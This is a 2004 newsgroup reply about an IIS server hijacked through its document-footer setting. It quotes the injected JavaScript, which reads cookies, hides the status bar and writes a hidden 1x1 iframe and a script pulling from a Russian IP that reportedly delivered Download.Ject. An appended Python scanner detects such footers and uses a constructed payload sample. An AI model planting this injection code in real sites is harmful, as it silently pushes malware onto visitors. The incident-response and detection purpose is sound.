Re: Russian IIS hack? Malicious Javascript code
From: Jeff Cochran (jeff.nospam_at_zina.com)
Date: 06/24/04
- Next message: Jeff Cochran: "Re: Webserver accessing Active Directory information"
- Previous message: Jeff Cochran: "Re: Can't access anything"
- In reply to: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Next in thread: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 23 Jun 2004 22:24:07 GMT
On 23 Jun 2004 14:00:35 -0700, rong@youngsinc.com (Ron Guyor) wrote:
>I've got the exact same problem here, same IP address, same footer
>getting added. How did you remove it?
>
>It's redirecting as a pop up which installs the Download.Ject trojan.
>Luckily most of my users have Symantec AV installed and it caught it,
>but now I'm trying to clean up and lock down my server.
>
>If you could give me some tips on removing the offending code, it
>would be most appreciated.
I think he said it was a footer in the IIS config for the web site.
Jeff
>Paul Lynch <paul.lynch@nospam.com> wrote in message news:<gumhd01faq0m59akfr4pkfshprhqo5no4d@4ax.com>...
>> On Tue, 22 Jun 2004 17:42:01 -0700, Oca Hoeflein <Oca
>> Hoeflein@discussions.microsoft.com> wrote:
>>
>> >I successfully removed some malicious code from my IIS 5.0 server that may not have had all its patches updated, but I cannot find any information on this malicious code that redirected, on a random basis, the users of my websites to a Russian website that appeared to be down, a domain called balamut.com
>> >with an IP address of 217.107.218.147 which RDNS to
>> >unassigned.m10-msk-ru.e-neverland.net
>> >
>> >The javascript code lived in some fake dll files in the inetsrv folder.
>> >One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.
>> >
>> >The offending code was embedded in every file that the website delivered, and on pages that had embedded .js files the JavaScript for those pages would not function.
>> >
>> >I have posted the offending code, maybe someone can identify this?
>> >
>> >As proof, check out a Google search for one of the functions in the code, okx12().
>> >
>> >You'll see the first link it returns is an RTF; if you view the HTML version you'll see this code appended to the bottom of the page.
>> >
>> ><script language="JavaScript"><!--
>> >var qxco7=document.cookie;
>> >function gc099(n21){var ix=qxco7.indexOf(n21+"=");if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return unescape(qxco7.substring(ix,es));}
>> >function sc088(n24,v8){var today=new Date();var expiry=new Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}
>> >function okx12(){window.status="";setTimeout("okx12()",200);}
>> >okx12();
>> >if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}//
>> >--></script>
>> >
>>
>> You're asking the wrong questions I'm afraid. Instead of trying to
>> track down the source of some l33t hAx0r code you should be asking
>> yourself 'how did this stuff get onto my server and what can I do to
>> secure my server and stop it happening again?'
>>
>> I'd suggest you start here:
>>
>> http://securityadmin.info/faq.asp#hackerstoc
>>
>>
>> Regards,
>>
>> Paul Lynch
>> MCSE
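The injection Oca describes was delivered through the IIS document footer, so it was appended after the closing tag of every page the server sent. As an added example (not code from this thread), here is a small Python checker a defender can run over fetched pages to flag the tell-tale signs: content after `</html>`, a 1x1 iframe, script or iframe sources pointing at a bare IP, and the status-bar clearing loop. The sample pages and the 203.0.113.10 address are constructed for the example.

```python
import re

# Constructed sample responses, not taken from the thread: a clean page and
# the same page with a document-footer style injection appended after </html>.
# 203.0.113.10 is a TEST-NET placeholder standing in for the attacker host.
CLEAN_PAGE = "<html><head><title>ok</title></head><body><p>hi</p></body></html>\n"
INJECTED_PAGE = CLEAN_PAGE + (
    '<script language="JavaScript"><!--\n'
    'var c=document.cookie;function okx12(){window.status="";setTimeout("okx12()",200);}okx12();\n'
    'if(location.href.indexOf("https")!=0){document.write("<script src=\\"http://203.0.113.10/dot.php\\">'
    '</script><iframe src=\\"http://203.0.113.10/dot.php\\" height=\\"1\\" width=\\"1\\" scrolling=\\"no\\"/>");}\n'
    '//--></script>\n'
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SIZE_RE = re.compile(r'\b(height|width)\s*=\s*\\?["\']?\s*(\d+)', re.I)
BARE_IP_SRC_RE = re.compile(r'\bsrc\s*=\s*\\?["\']?\s*https?://(\d{1,3}(?:\.\d{1,3}){3})', re.I)
STATUS_LOOP_RE = re.compile(r'window\.status\s*=\s*""')

def trailing_content(html):
    """Return whatever follows the last </html>; an IIS document footer is appended there."""
    matches = list(re.finditer(r"</html\s*>", html, re.I))
    if not matches:
        return ""
    return html[matches[-1].end():].strip()

def scan_response(html):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    tail = trailing_content(html)
    if tail:
        findings.append("content after </html> (%d bytes)" % len(tail))
    for tag in IFRAME_RE.findall(html):
        dims = {name.lower(): int(val) for name, val in SIZE_RE.findall(tag)}
        if dims.get("height", 100) <= 1 and dims.get("width", 100) <= 1:
            findings.append("hidden 1x1 iframe: " + tag[:70])
    for ip in sorted(set(BARE_IP_SRC_RE.findall(html))):
        findings.append("script/iframe src pointing at bare IP %s" % ip)
    if STATUS_LOOP_RE.search(html):
        findings.append("status-bar clearing loop (hides the real link target)")
    return findings

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_response(page) or "no findings")
```

The trailing-content check is the one most specific to this incident: a footer set through EnableDocFooter/DefaultDocFooter shows up on every page, static or dynamic, which is why Oca saw it in everything the site delivered.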